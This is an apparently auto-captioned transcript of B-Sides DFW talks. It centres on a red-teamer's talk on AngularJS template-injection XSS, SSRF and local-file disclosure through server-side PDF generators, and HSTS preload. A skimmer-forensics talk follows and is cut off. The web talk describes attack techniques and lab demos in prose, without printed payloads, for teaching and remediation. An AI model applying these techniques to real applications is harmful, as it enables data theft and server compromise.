XAI is a buzzword it's explainable AI and it's a great thing to google that term XAI it'll get you right where you want to be in in talking about explainability Fairness, accountability, and transparency. Google has a good document and Microsoft has a good document. Both of them are kind of looking into this and coming up with ideas on how we can get a handle on accountability and transparency. Finally, the AI Village at DEF CON, these are, they have a Discord. Hit them up on Twitter. Get information about the Discord. Join the Discord. Join the discussion. These are really specific smart folk who are right on the cutting edge of this research. And they're good people and great

to know and to have as resources to discuss AI security with. And with that, that is my time. I, again, just really appreciate this opportunity to talk again at B-Sides DFW. Thank you so much for attending this. I hope it was exciting, maybe interesting at least. be useful. But in any event, I really appreciate all of you. Thank you so much. And I'll see you later. Bye bye.

Hi everyone, my name is Kerry Hooper. I'm here to talk about some modern web application vulnerabilities. First off, thank you to the B-Sides DFW staff. I really appreciate you all. And also I appreciate you, the viewer. Thanks for coming and thanks for viewing my talk. First, who am I? As I said before, Kerry, I also go by Hoop. I'm on Twitter at NoPantRootDance. I'm a red team analyst. I have some offensive security certifications, also SysP. I like fishing, both types, and some golf, and I love building things, regardless of whether it's virtual or physical. So why have this talk? Why listen? Why care? So over the last year, I've done some deep dives into some modern web application

vulnerabilities, specifically things that I've seen both in the wild and in clients. I wanted to have a deeper understanding of all these bugs and also the applications themselves. I ended up building a platform. I like Python, so I built a vulnerable platform in Python in order to implement some of these bugs. Because in order to better understand it, I figured I'd want to build it myself and play around with it. Also, I'd have to come home every night and my mind was filled with all the OWASP top 10, injection, cross-site scripting, all these new vulnerabilities that I was learning, and I wanted to share with my significant other. She had no idea what I was talking about. So I decided to build these into some sort of demo application

to showcase them to her and better explain what I did, how I did my work, and what I was excited about when I came home. So in order for these demonstrations that I'm going to demonstrate today, I built them into this web server. It's on GitHub at the link below. I'll distribute it in the Discord server as well. This is a program written in Python, specifically the Cherry Pie module. some JavaScript and HTML in there, but mostly pretty much in Python. There are three PDF modules that were utilized, and we'll get into more of those later. So that's what you'll need at home if you decide to replicate these bugs. But also I've built it into a Docker container. It's also on Docker Hub if you'd like to

take a look. So what are we going to talk about? The first is AngularJS template injection. Second is unsafe PDF generation. And the third is the bootstrap man in the middle vulnerability and also the importance of HSTS which is HTTP strict transport security headers and also HTTPS everywhere. So more and more there are application security trends of three main things. One the reliance on client side frameworks hence we'll talk about XSS and angular.js. Also more and more reliance on integrating third-party tools server Server speeds are getting faster and also they're getting cheaper and cheaper as companies move to the cloud. So the server load isn't as much of a big deal anymore as it was 10

years ago. Therefore application designers can input these third party modules without any additional decrease in speed or efficiency of the application. Therefore we're seeing a lot of this plug and play behavior, especially the generation of PDFs which I've seen more and more as I've investigated this vulnerability. As the network attack surface is shrinking, network security perimeters are being more hardened. We will see more and more client side attacks as evidenced by the data breach investigation report from Verizon. Phishing is becoming a greater attack vector, but I believe we'll see more man in the middle attacks, especially with all these misconfigurations. So let's get started. So AngularJS, who's heard of it? I'm gonna give a chance for all of the hands

to get raised. I see some hands. I see some virtual hands. There we go. So AngularJS, for those of you that might not know, is a front-end JavaScript library. What you really need to remember is that it makes things pretty. It makes things beautiful in the browser. It runs client-side. It runs in the browser. It's also open source and was created by Google in 2010. It is different, though, from technologies such as Angular, Vue, React, they do very similar things. They're all generally MVC frameworks, model view controller frameworks. And they run in the front end. They run in the browser. Now, it's very confusing. AngularJS is not to be confused with Angular. And when I talk about these vulnerabilities, all these vulnerabilities are specifically

in AngularJS. When I say AngularJS, it's everything below version 2.0. Angular, it's everything above 2.0. And there's a big difference between the two. It's not easy to upgrade at all. There's actually a complete revamp of the framework. And that actually contributes to why this vulnerability is still present in a lot of web apps today. If you think about, some of you might have been on Teams developer teams upgrading from jQuery or upgrading from PHP 5 to PHP 7, it's a big deal. It might be difficult to upgrade. It might be, more importantly, costly for application teams to upgrade. And everything breaks if you try to use that new framework. You really have to rewrite things from the ground up. So as a result, development

teams will use this older framework, even though it has some of these weaknesses. Once I started looking for AngularJS, once I knew what it was, I would find about 50% of the time they'd be using the newer version of Angular and 50% of the time the older version of Angular. Alright, let's discuss templating as well. So Angular uses this concept called templating. And we can use this as an example of seeing what Angular might look like. Say you right click in the browser view source, what exactly are you looking for? One, AngularJS will have ng directives and they'll look like those attributes. If you look at the body attribute, ng-app, ng-controller, these are all attributes which key you in at the AngularJS library to pay

attention to those. You'll also see some script imports. In this case, it's importing the AngularJS script. as references to app.controller or scopes. All these are angular-like things and you may also see these in the other front-end frameworks too. That's how you know you're dealing with this MVC framework. You also see these templates which are delimited by those curly Q brackets surrounding message in this case and we'll talk a bit more about how templating works. So template injection. So These templates are present within the page and the JavaScript library replaces those on the fly with that JavaScript logic. Some of you may have heard of server side template injection, maybe, maybe not. I encourage you if you haven't, look it

up, look up on payload all the things, let's Google it, there's a ton of good write ups on that. Essentially in server-side template injection, user input is handled unsafely by the server-side templating engine. Some examples of this would be Twig, Jinja2, or Velocity. However, in client-side template injection, it's the exact same thing. Untrusted input is being handled by that client-side library, by JavaScript, but it's also being executed by the templating engine. So the result for server-side template injection may be as bad as what? you a chance to think in your heads what might it result in. Some of you might know, RCE, remote code execution. You can execute code on the server. But in contrast to that, client-side template injection, remember it's JavaScript only. If you can execute

JavaScript, the result is going to be cross-site scripting. So through this injection technique, we're able to inject JavaScript into the client browser, into the victim's browser, a lot like reflected or stored cross-site scripting. Putting it all together, AngularJS template injection deals with templates. There are certain expressions that are delimited with these double curly Q brackets, and these are replaced at runtime. The JavaScript library is accessed, and that object and attribute of the object are replaced at runtime. Now, this attack was introduced by Mario Heydrich in 2016. Also works for Cure 53. Six years after this front-end framework was actually created, Mario came up with this injection technique. And the reason why this works is because he was able to access objects within JavaScript and draw off their

primitives in order to construct payloads that would result in client-side code execution. Angular actually, the AngularJS team introduced a sandbox to help prevent some of these attacks. After Mario gave his talk in 2016, 2017, September 2017, they came up with a sandbox, which attempted to limit the scope in which these JavaScript objects could operate. So since 1.1.5 this sandbox was running and and for those of you that might not know what a sandbox is it essentially limits the scope that these angular objects had access to so it couldn't access any of the critical objects such the document or the window

since since the sandbox was created there were multiple multiple multiple sandbox bypasses I've got this link I'd encourage you to take a look at this article. Great article, great link containing all of the known, at least all the ones that I know of, the sandbox bypass of the AngularJS. Now, I don't pretend to know exactly what all of this JavaScript means. Jan Horn created one that bypassed the sandbox in 1.2, Gareth Hayes in 1.3, and Ian Hickey in 1.5. And all of these were just ways of breaking out of that sandbox context in order to access that primitive JavaScript objects in order to execute code. I would highly recommend Gareth Hayes B-Sides Manchester 2017 talk. Awesome explanation if you guys are interested

in more research. Finally, version 1.6 bypass came out. Mario Heidrich, the original creator, came up with this primitive bypass constructor.constructor, which was the nail in the coffin for AngularJS. And actually, after this, the AngularJS team didn't even create the, they didn't implement the sandbox anymore. They threw it away and basically threw it in the garbage. So why were they able to bypass this in so many different ways? That's mainly because JavaScript is weird. JavaScript is so weird. Anybody who has programmed in JavaScript knows this. So Brian Hysel presented this topic in Besides Augusta 2018, and he talked a little bit about quote-list strings and JavaScript types. In the top box there's the exclamation point with two square brackets. Now JavaScript interprets that as the

Boolean value false. interprets just regular square brackets as an empty array or possibly an empty string and he showed that by concatenating them together by adding those together in JavaScript it actually equals the string false yeah JavaScript's weird so with the string false you can then access this the string primitives or the string functions you can call this from char code method and with many, many different ways of executing arbitrary JavaScript code. Someday I hope to understand exactly why all of these are the way they are. If you know, let me know. I'd love to learn a little bit. Just understand, JavaScript is really weird, and many times there are dozens of ways to accomplish the same thing. So that's why

there are many JavaScript bypasses. The sandbox was eventually abandoned, and the AngularJS team said that it wasn't actually meant for 100% security. And so remediation. We'll talk about that after the demo. So this is my AngularJS app. It's a hello world type app that basically takes in one parameter from the URL, a get parameter, and it places it within the DOM. Pay attention to those three red boxes. These are hallmarks of an Angular app. You've got the ng directives, you've got the angular import, you've also got references to controllers and scope.

detect this with a really cool tool I want to introduce called Wappalizer. It's been around forever, some of you who are pen testers might know about it, but it's a browser plug-in that plugs into both Firefox and Chrome and it can detect exact versions of certain things running on websites and it's great if you're doing bug boundaries as well. Anyway, so this application takes in untrusted user input and puts it directly into the page. Some of you might see this and automatically think hey that's some reflective cross-site scripting right there. Let's test it out. All right, I'm going to mirror the screen.

And let's check out the demo. So I've got the demo here. This is the app running on localhost. As I refresh the screen, you might be able to see those templates reflecting within the page. For that split second, the JavaScript hasn't executed and the template is visible to the eye. Honestly we've got some reflection going on. BurpSuite would call this input reflected within the HTML. We can change the name in order to change the name that's presented in the page. But what evil things can we do with this? Well some people might try putting in a script tag in order to try to execute HTML. But as we see the script tag didn't execute, it was just reflected in the page. Looking at the source we will

see that the application is putting some input sanitization in place. It's actually sanitizing those angle brackets and replacing it with the HTML encoded ampersand greater than semicolon. So how do we get around this? We can get around this with AngularJS XSS. So by crafting this AngularJS payload which bypasses the sandbox for 1.6.9 execute an alert within the application. Whereas we wouldn't have been able to before with standard payloads.

All right, moving back to the presentation. Extend.

Are we good? Cool. All right, so what happened? we weren't able to use those standard payloads. This was meant to mimic some PHP type functions like HTML special chars or HTML entities, which would normally sanitize effectively that user supplied input. But using this front end technology, we were able to bypass those traditional cross-site scripting remediations and actually execute script within the context of the user. So we talked about remediation. User input is always evil. a hallmark of application security. You know, I think six out of the 10 of the OWASP top 10 deals with this untrusted user input. And when I talk about user input, I'm talking about everything from parameters, not just parameters, but cookies, user agents, headers, everything. Everything

should be untrusted until it's properly sanitized and vetted. The more that I this front-end framework the more that I tested for client-side template injection in AngularJS XSS. And I started seeing it everywhere. Maybe it was the attribution bias, maybe not. But I started seeing this in app after app after app. And even one of the technology giants flagship apps, I saw this. And I found client-side template injection. Normal sanitization doesn't always work to remediate these. And that's why front-end frameworks have to be kept in mind. User experience is always king and it's going to contribute to these front end frameworks being used more and more in the past. So user input is always evil. That's one of the themes of

this talk. Next I'd like to talk about the next class of vulnerability, unsafe PDF generation. This wasn't intuitive for me at first, but again, much like AngularJS or client side template injection, saw this and understood the vulnerability, I saw more and more in applications all over both in my organization and on the internet. So as server resources are not as much of a priority, web application complexity has been increasing and increasing and increasing. Developers got a sticky note on the to-do board. It's so much easier just to plug and play a third-party library and get that functionality within your app rather than build it from scratch. So I believe we're going to see more of a reliance on this, especially for something

as complex as PDF generation, which may require the parsing of websites and HTML.

However, the inclusion of these third-party libraries may also include those security bugs or short-sightedness from the developers and the security teams. Maybe they didn't think about the whole picture before including these in. So in order to talk about this, we first need to discuss server-side request forgery. I know many of you may be familiar with this already, but I'd like to discuss just to make sure we're all on the same level. Typically in a server-side request forgery, the client or the browser is able to send a certain request to the server and cause that server to make some sort of other request. Usually this is an HTTP request. So if I can contact the web server in the cloud and cause it

to make an HTTP request, that would be an example of server-side request forgery. what can you do with this? You can bypass firewalls, you can scan ports, you can also access local host data, sometimes secrets, sometimes AWS metadata. This was showcased in the Capital One breach a couple years ago. Capital One's cloud platform was able to be completely taken over, at least their cloud account was taken over by a server-side request forgery in the cloud. The SSRF can be incredibly powerful. I believe it'll fall in with the OS top 10, specifically A1 injection. And Orange Psy really took this to the extreme to demonstrate how big of a deal SSRF can be in the form of protocol smuggling.

I encourage you to take a look at this blog after the presentation This is one of the screenshots from his blog. He's able to chain together four different weaknesses in order to result in code execution on the remote server I don't expect you to understand all of this, but just I'll give you the high notes here. The first bug in red is a harmless SSRF. It's constrained that is the

the URL encoded resource was just kept as such and wasn't treated as bits and bytes. It wasn't URL decoded. However, he was able to chain this with a second SSRF bug in light blue and that was a good thing. an unconstrained bug. Using that unconstrained SSRF, he was able to manipulate that with the use of URL encoding, and the URL encoded bytes were decoded by the server, and then he was able to smuggle that additional protocol in, and eventually resulting in unsafe deserialization in a Ruby gem. Highly encourage that blog post, one of the best I've seen. Two security researchers, both at the time, not sure if they still do, both at the time worked for HackerOne. They presented on

this topic in DEFCON 27, owning the clout through SSRF with PDF generators. This was Ben Sadagapur, AKA NomSec, and Sarah Brocious, AKA Dakin. They did a really good job. I'd encourage you to take a look at that talk. It's on YouTube as well. a story about how they were able to hack a ride-sharing app. They found that the ride-sharing app gave them invoices in the form of PDFs and their user input was taken, trusted, and put into that PDF and they were able to manipulate the HTML that was being rendered. figured out if they were able to manipulate the HTML, they were able to possibly inject script tags or break out of style tags. And

eventually they found the SSRF. They read the manual extensively on the actual PDF generator that they were able to find, which I believe was WheezyPrint, the one that they exploited. And they found these bugs. They were able to own the entire cloud environment by accessing the metadata. Strongly encouraged watching their talk. There's many PDF generators online. Just Google free PDF generation online. There's a good chance that they're going to be generated on the server side. And I would guess that many of them are vulnerable. PDFs are everywhere. Users love PDFs. Application teams love PDFs. I guess our society is just in love with PDFs. I see them everywhere. How does it work generally? Well, in order for a PDF

to be created, there's either going to be an image that's going to be put into the PDF format or it's going to render that HTML. And there's two ways to do this. One with HTML renderer and one with a headless browser. We'll get into both on the next slide or two. Just a quick Google search for free PDF generator. What do we get? 242 million. That's a lot of results. between a headless browser and HTML renderer. Headless browser is generally like a browser without a GUI. Some of you might have heard of Puppeteer, Headless Chrome. Those are the ones that come to mind. And it typically executes all the JavaScript to correctly render the page. Now on the other hand, HTML renderer, it parses the HTML

without the logic of a browser engine. And typically, I say typically because sometimes they do, it typically doesn't execute JavaScript. However, for both of them, when they're rendering PDFs, untrusted HTML is bad and at a minimum, if parsed untrusted HTML, it can result in SSRF. And also XSS, cross-site scripting, which is execution of JavaScript in an app, may result in JavaScript execution on the server side, which has some strong implications that technically would be remote code execution. three examples I want to walk through and I've got three examples that I'd like to demo the first is using an open source library called WK HTML to PDF this this is the app that that'll be used on the background it uses

a rendering engine called QT WebKit and we can use an image tag if we inject an image tag we can invoke on HTTP get after all it has to reach out and it to reach out and grab that image in order to include it in the PDF. So if we have it reach out to a server under our control, we can reveal the user agent. In this, I developed a quick and dirty Python script, echo useragent.py. It's on GitHub if you want to steal it or make it better. However, I'm going to use that in this demo in order to show that we can reveal the back-end server-side PDF generation technology with that user agent and causing an SSR off to a server we control.

Here's an example of this, and specifically, this shows the WKH-E-M-L, the PDF within the user agent, and sometimes even it gives a version. We're going to do both these. So what else can we do? Let's show in a demo how bad this can be. I'm going to take it off presentation mode. Let's go. One sec, please. Let's check out this pwnage via PDF generation. the app, create a PDF, generate a PDF. In this case, we show the front-end technology, WKHTML to PDF. However, most applications won't actually do this. So let's catch the user agent in order to figure out what we're dealing with here. First, you might test the functionality and see what happens. In this case, as is the case that I've

seen a lot, the PDF will be stored on the server. PDF is not stored on the server, I've also seen it stored in the cloud and in some sort of storage bucket, be it AWS, Azure, or Google Cloud Platform. So let's test this with a primitive payload to invoke that server-side request forgery. Name it test2. We've got a h1 tag in HTML that's a header, right? It should be big and bold. And then we've got the image tag down below. And the image tag contains a reference, href, to an image online. In this case, it's a cat. Once we generate the PDF, look at the PDF, we should see a picture of the cat. That tells us

that the server went out and grabbed that image of the cat and put it into that PDF. just caused a server-side request forgery. And that's the most primitive, is just catching an image or getting an image in an image tag. But we can use that by requesting an image in a server under our control. And we can see the user agent. So here we go. We're going to local host, which I've got a listener on, on port 80. Capture user agent. As soon as we generate that PDF, we should see the user agent. be a whole http request all the script is is just parsing that request and putting the user agent to the terminal and here we go there's the

user agent there's wk html to pdf

all right but how can we take this further what what are we worried about what is our nightmare scenario with the server-side request forgery now this is just an html renderer what we can do potentially is access secrets on the server itself that may not be accessible to anybody externally. It may not be accessible to anybody except for localhost. And this is a way to expel secrets from localhost but also from the intranet because there's a good chance that this server is in a DMZ and it has special access to internal resources. So we can do that with an iframe. put the source of the iframe equal to a privileged resource just for this demo we had a slash secret and then we submit

that the PDF generator is going to reach out grab that secret and then render it within an iframe let's see how that looks yep outside frame and we've got the secret right inside so this is one example of pwnage we can we can reap with just WK HTML to PDF which is HTML renderer.

Alright, let's move on. Changing the screen again.

Alright. Alright, what's the next baby we can kick? Oh this one was kicked before at Defcon 27. This is WheezyPrint. This is called a visual rendering engine and

CeePrint is called on their website a smart solution, helping web developers to create PDF documents easily. It's really easy to install. It's a pip install. However, it does have quite a few dependencies. Most of those dependencies are already satisfied on Linux. However, with Windows, it's a bit involved to get those libraries on board. Please reach out if you want to try to replicate this. I can help you through. So in the exact same way as before, what we want to do is try to to extract the user agent. We're gonna figure out what's the backend technology. So in the same way, we should catch the user agent just as easily as using echo user agent.py. We could catch a response say in the Burp

collaborator if you're a Burp Suite Pro user or any other of those third party services. And you'll be able to see all the headers for example, not just the user agent. Here we see the user agent is Weezyprint. Luckily the developers give us the actual version as well. That's real nice. Let's see how this could look. Now there's a little bit more to this demo and I want to surprise you all because this is not intuitive at all. And this is the coolest part of the DEF CON 27 presentation, only the cloud in my opinion. manner as before we see user print let's catch the user agent we already know how that it creates a pdf we've got that running already and let's take a basic user agent

payload create a pdf all right at this point the browser is going out and it is uh excuse me the the back end wheezy print it's going out and grabbing that thinks it's an image and uh we capture the user agent wheezy print 47. One of the cool things about WheezyPrint is that it gives developers the ability to include local files. This is not intuitive at all. So given a crafted payload, we're able to include a local file as well. I want to show you here that the iframe payload doesn't actually work with this particular headless browser. The iframe just shows up like garbage. Let's try to include a local file. In order to do that, We're going to use an a a tag in HTML. They

also call an anchor tag And I've got the payload right here. Let me paste it in

So during the DEFCON 27 research Ben Sadiqapur and Sara Brocious that by reading the documentation that this was actually possible that they were able to include these local files using the href which is a reference to a local file on the C drive when the PDF was generated it was that it actually showed up as as a link however the file was embedded inside the PDF let's see that in action I'm going to use a I'm going to save this PDF locally and I'm going to use a script that goes through and parses the PDF object, extracts all of those encoded objects within, and then decodes them. And hopefully we'll be able to see the file that was

embedded inside the PDF. First I'm going to save it locally.

And then after that, decode it and there's no encryption going on here this is just a flate encoded file and here we see the password file that happened to be on this in this temp directory really cool right now I mean that in a terminal is cool and all let's let's move the terminal out of the way and we can see by clicking on the actual link in the PDF document you'll be able to see that we can download the file directly from the PDF with that file href. There it is. Really cool. All right. Moving back to presentation mode.

All right, we just saw this. In this case, we got win.ini. Great. Now, example number three. where it gets super cool. I don't have a demo for this one but I'd like to show you in these screenshots. So Chrome, Headless Chrome, who's heard of it? Probably half of you. Actually everyone in this room. Great, oh wow we got some, all right. We got some techies in this room. All right so this is basically just chrome.exe with the dash dash headless flag. shipped by default in Chrome 59 and 60, so there's a good chance if you're using Chrome right now, you can use it with the headless option. And I've actually seen this more and more in web applications, specifically Chrome, because it's so easy. It's plug and

play. You can invoke it with this command, chrome tach-tach headless, tach-tach disable GPU. They recommend disabling the GPU on Windows. I don't know why. And then the print to PDF option goes out and it sends Chrome to a website or a local HTML document, and then it creates a PDF out of it. And this is a full feature headless browser. So this is how it might look. When we catch the user agent, it will actually say headless Chrome. It doesn't use the traditional Chrome user agent, which I think is pretty cool. It renders the PDF like that as a non-existent image. So this is a full feature browser. This can do everything a regular browser can do. So what can we do with it? Can

we do JavaScript execution? So when submitting this JavaScript to Chrome is going to go, take that HTML, try to parse it, see that there's a script tag, try to execute that JavaScript. And as a result, document.write is executed within the PDF. do a lot more than with this and I probably don't have to explain to most of the audience members. We now have code execution on the server in the form of JavaScript. So you can do things such as utilize the request API for example in this using the fetch API the request interface of the fetch API we can create web requests. This can request an internal document fetch it and then with that do something with the response.

For example, you could then take that response, send that out to an exfiltration server, you could send that to a Burp collaborator instance, you could send that anywhere you want. And not only that, you could do this programmatically and try to access all of those internal endpoints, hey, maybe all of the ports on those external and internal endpoints. And you could really wreak havoc, especially given unbridled access to execute JavaScript on a server that is in the DMZ.

some limitations of that. Browsers have internal security mechanisms. One of those is called the same origin policy or SOP. So an origin in HTTP is a tuple of a scheme, a host name or domain, and then a port. And those three things all make up an origin. Now the same origin policy says that JavaScript on host A can go out and access a totally different host if they are of a different origin. It can't go out and access information and bring that back in. So that's enforced by the browser specifically. So how do we bypass the same origin policy? How do we bypass that? Well, there's this nifty little tool called cross-origin resource sharing. So CORS, or cross-origin resource sharing, is

a relaxation of the same origin policy. And it allows resources to be shared between different origins. Now there's many different ways to identify a misconfiguration in CORS, but a few of them are reflected origin or having a null origin, or just a website has access control allow origin header, which is just metadata with a star symbol.

I'd highly recommend any of those of you interested in this to go to the Pentester, sorry, the Web Security Academy. There's some excellent course challenges there. So there are often many times ways around this, and these can be achieved through this JavaScript

on the server. There's also a thing called DNS rebinding, which can get really nasty, and I'm not going to go into it here because that's a whole other talk, and I'd love to give that talk some other time, maybe at a Hack Fort Worth or DC 214. So DNS rebinding essentially tricks the browser into violating the same origin policy, and it does this with a malicious DNS server and JavaScript execution. access to private networks by tunneling traffic through the victim browser which is essentially a zombie browser and it's it's a really cool attack not only that there's been a number of tools that have been released lately specifically NCC group singularity that makes this extremely easy whereas before it took minutes now it's taking seconds

so remediation for this untrusted PDF generation so I would recommend

PDFs within a client, within a client-side library. If you're not parsing the HTML on the server, these vulnerabilities can't occur. Also, don't trust user input. That's again, one of the themes of this presentation. Do not trust user input. Sanitize and prevent this from getting ingested directly by the HTML renderer. Next, and finally, I'd like to talk about the bootstrap man-in-the-middle vulnerability and the importance of HTTPS. Start with a quick primer on what a man in the middle looks like. Think to yourself, close your eyes, go to your happy place, and maybe think of a man in the middle. What does it look like? All right, well, we've got one here on the screen. This is an example of

an ARP spoofing attack. If you're on the same LAN as a victim, you can impersonate the router. Another one might look like a Wi-Fi pineapple, like a Hack 5 Wi-Fi pineapple. Another one might be your ISP, your internet service provider, collecting traffic or collecting what you're looking at online. The next is a an HTTPS decryption utility which many many enterprises use for security purposes that decrypts that TLS traffic and then re-encrypts it for inspection. And then perhaps maybe a legal man in the middle, maybe an FBI court order or Freedom of Information Act. No, Patriot Act, that's it.

A really cool example of a man in the middle vulnerability released in 2005, years and years ago now. Matty Aroni, I think he's still president of Offensive Security, came up with his blog post. The tiny URL is in this slide. I'm not gonna get into this attack because I don't think we have time, but I'd highly encourage you to go out and seek it. It involves spoofed UDP packets, resetting the Cisco IOS router configuration, enabling TFTP and then reconfiguring it to make your GRE tunnel with you in the middle. In 2009 Moxie Marlin Spike at Moxie released a tool called SSL Strip at Black Hat 2009. Really cool tool. So this allowed, this made man in the middle attacks so much

easier for HTTPS traffic. Has anyone heard of this? Maybe? Yeah. This is a nasty tool. essentially Moxie trying to defeat session encryption or that that HTTPS encryption well he found that he was able to insert himself between a victim and and the server by matching and replacing by taking advantage of that first HTTP request that came in which is in complete plain text taking off the HTTP put it on the HTTPS and then forwarding that to the server they would be

forward that response from the server and give that back to the victim and and this was a really smart tool and it made man in the middle so much easier so let's talk about http real quick uh http headers when you send over when you send an http request to twitter what does it look like you have some sort of verb a get post to delete something in in the first line and remember this is all part of the http protocol sort of resource that you're looking for and then the protocol and version. In response you might receive an HTTP response code and in this case 301 means moved permanently and then a bunch of data back in the form of headers and all you

need to remember is that headers are just essentially metadata. In this case the location is extremely important because when paired with the 301 it tells the browser to redirect to another resource in this case HTTP HTTPS, the secure resource. So the browser makes this next request to twitter.com. A whole bunch of other headers are returned. But one specific one that I'd like to talk about is the strict transport security header. So strict transport security, max age. And let's dissect this a little bit. So HTTP strict transport security, also called HSTS, If you want to read the manual, it's RFC 6797. And it allows sites to declare themselves accessible only via secure connections. So breaking this out, we have the header and

then the directive, which is the number of seconds to abide by HTTPS. In this case, it's two years. Include subdomains directive, that means this applies to all the subdomains as well. the preload directive which states that this value should be preloaded into the browser. So once this header is returned to the client, the client will no longer use unencrypted methods. It will only use encrypted HTTPS. And that's how powerful this is because it effectively prevents man in the middle attacks, barring some sort of certificate or encryption vulnerability that could just shatter the entire ecosystem. For example, let's talk about HomeDepot.com as a case study. User visits HomeDepot.com and an HTTP request is sent. If you type that into your

address bar, press enter. If you've never visited that site before, an HTTP unencrypted is gonna be sent. Home Depot's gonna go back, redirect you, the browser's gonna go grab the HTTPS, the secure version of the site, and then you're gonna receive the response back. That's generally how the flow goes. However, next time you visit HomeDepot.com, exact same thing is going to happen. That first request is always going to be unencrypted. Next, let's take a look at CDC. CDC does it a lot better. On the first request to CDC, user types in cdc.gov, they want to figure out what the latest guidance is on COVID. An HTTP unencrypted is sent. They respond, hey, 302, you need to go check out the, the browser needs to check

out the secure version of the site. the secure version of the site is retrieved, and then CDC sends that back in an encrypted channel, all of the content, but with that extra HSTS header. And that extra HSTS header instructs the browser, and the browser saves this, hey, never again go out and reach out for HTTP. Don't go unencrypted. Always trust me in an encrypted manner. So when the user returns to the site the next day, because he forgot the guidance already, will refuse to send that unencrypted request. And instead, it will only send that encrypted request, thus protecting the user, especially if the user is on an untrusted network, such as a local LAN, copy shop, Wi-Fi, et cetera. There are many examples

of HSTS misconfigurations. I'm not going to get into all of them, but they're widely misimplemented on the internet. One example is Microsoft Live.com. For example, if you visit live.com, it redirects you to https outlook.live.com slash owa, and it issues the HSTS header. So why is this an issue?

Well, strict transport security, or the HSTS header, is counted per domain, and the subdomain is not the same as that domain. So when that HSTS header is responded, it only applies to outlook.live.com. So the client's going to make an unencrypted request every single time they put live.com into that browser bar. So live.com is put in the browser bar and unencrypted request is made. They're redirected to outlook.live.com. They go out and get the encrypted version and they're sent back an HSTS header. the next time the user visits live.com, this HSTS does not do its job because that HSTS header is never applied to live.com and only unencrypted requests will be made because of this configuration. This might happen when a user gets a new browser, it

might happen when a user uses private mode in some browsers, or it might happen when the user has, it's their first time visiting a site. But this is documented in the RFC actually, it's called the bootstrap man in the middle vulnerability. It's been around for at least 10 years. This has been published for 10 years, and it's a known issue. There's only one way that I know of preventing this. We'll get into that in a bit. So potentially, right today, an attacker could man in the middle a live.com visit on an untrusted network using SSL Strip. Still, 11 years after Moxie released that tool. So the solution to this is HSTS Preload. Preload is a mechanism in which these

HSTS sites can ship with the browser. The browser is downloaded and it's automatically stored. It's in the code. It's in the repository. As long as the site meets certain specifications. Includes subdomains, has safe redirects, and the max age is sufficiently high. If this site is preloaded, if a domain is preloaded, no HTTP sites will load. No unencrypted sites will load at all, even for internal sites. So watch out if you want to do this on your corporate network. However, I would highly recommend HTTPS Everywhere. All right, let's hop on over to the demos, duplicate the screens. You can check yourself. I'd actually love to show this one. You can check yourself within a browser, and I'm going to show you the developer tools. exactly as we

saw before, go to cdc.gov and that first request is going to be unencrypted.

We look at the network tab, go to cdc.gov.

Click on the request to see more about it. Click on that first one and you can see with the lock with the slash through it right there. That's an unencrypted transmission. Now CDC correctly

redirects the user agent or the browser to that HTTPS site, correctly issues that HSTS header, and then the very next request will be encrypted.

Let's show the HSTS preload. HSTS preload can be viewed on HSTS preload.org. It's a Chromium project. And the Chromium team, thankfully, assembles all of these domains into a repository and they actually ship with the main browsers. The main browsers being Edge, Firefox, and Chrome. I'm sorry I mentioned Edge as part of those big three. I had to. Anyway, we can check this at hstspreload.org. It's got the submission requirements. But more importantly, you can check if your organization's domains are safe or not. For example, if we type in CDC.gov, it states no, they're not preloaded and this is why. It's doing everything right, but it's just not issuing the preload directive. We put in live.com, there's a number of

issues with that. The redirect, one, there's no HSTS header supplied for the HTTPS version and the HTTP doesn't redirect correctly. So this is a good way to check and audit your website to see if it's completely safe. put in my website, hooperlabs.xyz, into the preload list. So it actually shipped with every browser, and I think that's pretty cool. So when we actually go in the browser to my website, the first request, even though the cache is cleared, even though the history is cleared, first request is always secure. And I think that's pretty cool. All

right, let's move back to the presentation.

Mediation. So, what can we do to prevent this type of attack? We can implement HSTS preload, but preload means security everywhere, inside your organization and out. And this mitigates many men and middle threats. It protects your users, not just the server, but it protects your users. And it requires one single header to be sent, but it can do as much as protect every single user on an untrusted connection. This concludes my presentation. These have been three classes of modern web application vulnerabilities. Thank you, besides DFW, thank you for watching. And I look forward to your feedback, and I look forward to answering your questions in the Discord server. Once again, I'm Kerry Hooper. Thank you.

Caleb and I'm here today to present to on our topic titled Hey I Hacked Your Skimmer, lessons learned in embedded device security by observing what not to do. If you're here to learn how to make a skimmer for yourselves, you're in the wrong virtual room. As I mentioned, my name is Caleb Davis and Zane Hussein will also be presenting with me. So a little bit about me. I joined Protivity in June of 2019, specifically the emerging technologies group where we worked on penetration testing of IoT devices, cloud infrastructure, AI ML and quantum computing. I have a degree in electrical engineering from the University of Texas at Tyler, where I began my career as an embedded software developer at a residential HVAC company. As

a software developer, I primarily focused on embedded C code on ARM core microcontrollers for HVAC controls. Being a developer also required me to focus how to securely design embedded devices, which eventually led me to the much more enjoyable task of actually breaking things. Now I work as an embedded penetration tester where I focus on things like hardware, firmware, RF testing, APIs, web and mobile application testing. So hi everyone, my name is Zain Hussain. I also work as a security consultant at Protivity alongside Caleb. newer to the team I joined around four months ago. So I studied software engineering at the University of Texas at Dallas with a focus in information assurance. I like to work with my

hands and so I jumped at the opportunity to work on hardware for the emerging technologies group. I'm passionate about cars and use my skills to hack them.

So let's take a look at our agenda. In this presentation, we'll first get an overview of the case, then we'll dive into the card skimming device itself. After that, we'll talk about the process of data exfiltration and analysis, then we'll go over the next steps and finally give examples of mitigations that can be taken. And at the end, we'll have some time for questions. All right, so what happened? The client found a skimmer on a POS system at a grocery store moved it and brought it to us. They wanted to understand what, if any, data was compromised. Our objective was to analyze the methodology used to skim and store credit card information, as well as recover any compromised data associated with the credit card skimmer. So what

did we do? Well, we rev